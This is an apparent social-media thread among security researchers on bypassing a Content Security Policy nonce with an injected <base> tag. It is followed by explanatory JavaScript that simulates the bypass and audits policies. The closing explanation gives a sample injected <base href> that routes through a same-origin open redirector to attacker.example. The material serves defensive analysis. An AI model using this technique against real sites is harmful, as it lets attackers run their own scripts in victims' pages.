OTOH base data: is a quirk, now a CSP bypass; no one would cry if we disallow this.
Yes, but even if data: is disallowed the problem is not gone.
Replying to @slekies
Right, but, you know. Welcome to the internet we built together. ;) Opt-out via ‘base-src’?
I don't even :)
Replying to @kkotowicz
‘base-uri’, sorry. https://w3c.github.io/webappsec-csp/#directive-base-uri
Hm. So wouldn't just adding base-uri be a fix to the nonce bypass via base?
Replying to @kkotowicz
Yes. It’s just ugly and maybe we can change our defaults to make it unnecessary to think about.
Why is default-src not working for base-uri? The PoC works even with default-src none.
Replying to @slekies
In hindsight, I should have added more detailed metrics than I did. I’ll do that next week. :)
base-uri 'none' works, but base-uri 'self' still allows bypasses via path-based open redirectors.
I like the proposal to disallow data: and expect sites which use nonces to set a sane base-uri.
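The points the thread makes (a nonce-only policy is bypassable by an injected `<base>`, `default-src` does not cover `base-uri`, `base-uri 'none'` closes it, and `base-uri 'self'` still leaves a same-origin path-based open redirector usable), as an added example that is not code from the thread or from any of its participants. The helper names, the sample origins app.example / attacker.example and the redirector path are assumptions made for illustration; the directive fallback list reflects the CSP spec's fetch directives and is the reason `default-src 'none'` alone does not restrict `<base>`.

```javascript
// Added example, not from the thread. Models CSP directive fallback and the
// <base>-based nonce bypass. Origins and the /redirect/ path are assumptions.

// Parse a Content-Security-Policy header into Map<directive, sourceList>.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Fetch directives that fall back to default-src when absent. base-uri is a
// document directive and is deliberately NOT in this set, which is why
// "default-src 'none'" on its own leaves <base href> unrestricted.
const FALLS_BACK_TO_DEFAULT = new Set([
  "script-src", "style-src", "img-src", "font-src", "connect-src", "media-src",
  "object-src", "frame-src", "child-src", "worker-src", "manifest-src",
]);

// Returns the source list governing `directive`, or null if it is unrestricted.
function effectiveSources(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  if (FALLS_BACK_TO_DEFAULT.has(directive) && policy.has("default-src")) {
    return policy.get("default-src");
  }
  return null;
}

// Simulate the bypass. The page legitimately contains
// <script nonce="..." src="js/app.js">; an attacker with an HTML injection
// point (but no nonce) injects <base href="injectedBase">. Returns the absolute
// URL the browser would resolve the already-nonced script element to.
function resolveScriptSrc(policy, pageUrl, injectedBase, relativeSrc) {
  const baseSources = effectiveSources(policy, "base-uri");
  let base = pageUrl;
  if (baseSources === null) {
    base = injectedBase; // no base-uri at all: the injected <base> is honoured
  } else if (baseSources.includes("'self'") &&
             new URL(injectedBase).origin === new URL(pageUrl).origin) {
    base = injectedBase; // 'self': a same-origin <base> is still honoured
  } // base-uri 'none' (or a non-matching host): injected <base> is ignored
  return new URL(relativeSrc, base).href;
}

// Audit a nonce-based policy for the two weaknesses discussed in the thread.
function auditNoncePolicy(header) {
  const policy = parseCsp(header);
  const findings = [];
  const scriptSrc = effectiveSources(policy, "script-src") || [];
  const usesNonce = scriptSrc.some((s) => s.startsWith("'nonce-"));
  const baseSources = effectiveSources(policy, "base-uri");
  if (usesNonce && baseSources === null) {
    findings.push("nonce-based script-src without base-uri: injected <base> re-targets relative script src");
  }
  if (baseSources !== null && baseSources.includes("'self'")) {
    findings.push("base-uri 'self': bypassable via a same-origin path-based open redirector");
  }
  return findings;
}

// Stand-alone demo with constructed policies.
const weak = "default-src 'none'; script-src 'nonce-r4nd0m'";
console.log(auditNoncePolicy(weak));
console.log(resolveScriptSrc(parseCsp(weak), "https://app.example/",
  "https://attacker.example/", "js/app.js")); // attacker-hosted script
console.log(auditNoncePolicy("script-src 'nonce-r4nd0m'; base-uri 'none'")); // []
```

The `'self'` branch is the case the last reply points at: the attacker's `<base href>` must be same-origin, but if the site has a path-based open redirector, `<base href="https://app.example/redirect/https://attacker.example/">` is allowed and the relative script path is appended to the redirector URL. Only `base-uri 'none'` (or not using relative script URLs at all) removes the injected base from the picture.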